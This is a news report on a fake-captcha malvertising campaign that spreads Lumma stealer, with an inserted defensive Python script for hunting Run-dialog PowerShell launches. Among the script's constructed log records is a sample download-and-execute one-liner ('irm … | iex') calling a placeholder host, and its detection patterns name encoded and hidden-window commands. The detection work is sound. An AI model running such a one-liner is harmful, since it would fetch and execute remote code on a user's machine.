A new cyber campaign using fake captcha verification pages has surfaced, unleashing Lumma stealer malware through a sophisticated web of deception. This large-scale operation tricks visitors into running malicious PowerShell commands under the pretence of verifying that they are human, stealing sensitive data, from social media credentials to financial information, from millions of users.
Researchers found that this campaign generated over one million ad impressions daily through a network of more than 3,000 content sites directing traffic.
The scam begins subtly: users encounter what seems to be a legitimate captcha page while browsing. After they follow a set of keyboard instructions, a Windows Run dialog appears and the page tells them to run a PowerShell command in it. Following these steps, victims unwittingly install stealer malware, exposing their personal and financial data.
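One way a defender can hunt for this flow in endpoint telemetry is to look for PowerShell started from the Run dialog (which makes explorer.exe the parent process) with a command line that hides its window, carries an encoded payload, or pipes a download into Invoke-Expression. The following is an added example, not code from the original article or from the researchers; the log records are constructed in a Sysmon-like key=value shape, and the URL is a placeholder.

```python
import re

# Constructed Sysmon-style process-creation (Event ID 1) records; not real telemetry.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\explorer.exe ParentImage=C:\\Windows\\System32\\userinit.exe CommandLine="C:\\Windows\\Explorer.EXE"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="powershell.exe -w hidden -nop -c irm https://placeholder.invalid/v | iex"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Users\\dev\\Code.exe '
    'CommandLine="powershell.exe -NoLogo -File build.ps1"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Command-line traits typical of a pasted one-liner: hidden window, encoded payload,
# or a download piped straight into Invoke-Expression.
SUSPICIOUS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download and execute": re.compile(
        r"\b(?:irm|iwr|invoke-(?:restmethod|webrequest))\b.*\|\s*(?:iex|invoke-expression)\b", re.I),
}

def parse_event(line):
    """Turn one 'Key=Value Key="quoted value"' record into a dict."""
    return {k: quoted or bare for k, quoted, bare in FIELD_RE.findall(line)}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event looks like a Run-dialog PowerShell launch, or []."""
    if basename(event.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return []
    # Commands typed into Win+R are spawned by explorer.exe, so it is the parent.
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]

def scan(lines):
    """Return [(record index, reasons)] for every record that triggers a rule."""
    hits = []
    for i, line in enumerate(lines):
        reasons = classify(parse_event(line))
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"record {i}: {', '.join(reasons)}")
```

Commands entered through the Run dialog are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is a second place to check during triage of a suspected victim.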
This ploy relies on malvertising — using deceptive advertising to distribute malicious content. Attackers infiltrate ad networks to ensure their fake captcha pages reach unsuspecting users.
On further analysing the campaign, researchers found that the threat actors utilised the ad network Monetag, a PropellerAds subsidiary, embedding obfuscated JavaScript into publisher sites to redirect users to fake captcha pages.
Attackers employed advanced cloaking techniques to bypass moderation. They initially submit benign URLs to ad networks for approval, only redirecting to malicious pages later, evading scrutiny and prolonging the lifespan of malicious campaigns.

Additionally, researchers found that the attackers host their fake captcha pages on legitimate cloud services like Oracle Cloud and Cloudflare R2, leveraging these trusted platforms to mask their operations.
Researchers identified over one million daily ad impressions linked to this campaign in just ten days, distributed through 3,000 publisher sites. These sites often feature free or pirated content, drawing users into the malicious flow via pop-ups and redirects.
Cyber security experts highlight fragmented accountability within the ad tech ecosystem. Key players — ad networks, tracking services, publishers, and hosting providers — often deflect responsibility:
- Ad networks: Claim difficulty in monitoring cloaked content.
- Tracking services: Argue they provide neutral analytics tools.
- Publishers: Maintain they only monetise their platforms.
- Hosting providers: Assert ignorance of malicious use cases.
This lack of unified oversight enables malicious actors to exploit vulnerabilities with relative impunity.
Following disclosures by cybersecurity researchers, Monetag and BeMob banned over 200 accounts associated with the campaign.
Experts suggest that ad networks implement post-approval checks for ongoing campaigns, perform strict account verification, and establish transparent reporting between networks.
Recently, reports emerged about a phishing campaign targeting employees of Kaiser Permanente via Google Ads. Last month, threat actor I2Parcae targeted victims via fake support emails and captcha tricks.